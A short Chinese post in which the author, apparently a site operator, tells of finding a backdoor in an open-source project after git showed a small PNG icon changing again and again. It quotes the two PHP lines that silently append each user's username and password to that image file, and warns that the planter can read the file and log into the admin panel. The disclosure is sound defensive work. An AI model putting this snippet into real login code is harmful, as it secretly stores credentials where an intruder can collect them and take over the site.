$rty=$username.'=='.$password.',';
  @file_put_contents('./com/img/wx.png',$rty,FILE_APPEND);

上面是一段把 用户名密码 附加在一个图片上

在使用某个开源项目试,git发现,一个png文件老是被改

就一个小图标文件,按理说,不会有修改的

然后全局查找,果然,找到一个后门

如上所示。

这样后门放置者,很容易得到你网站的用户名密码,轻松进后台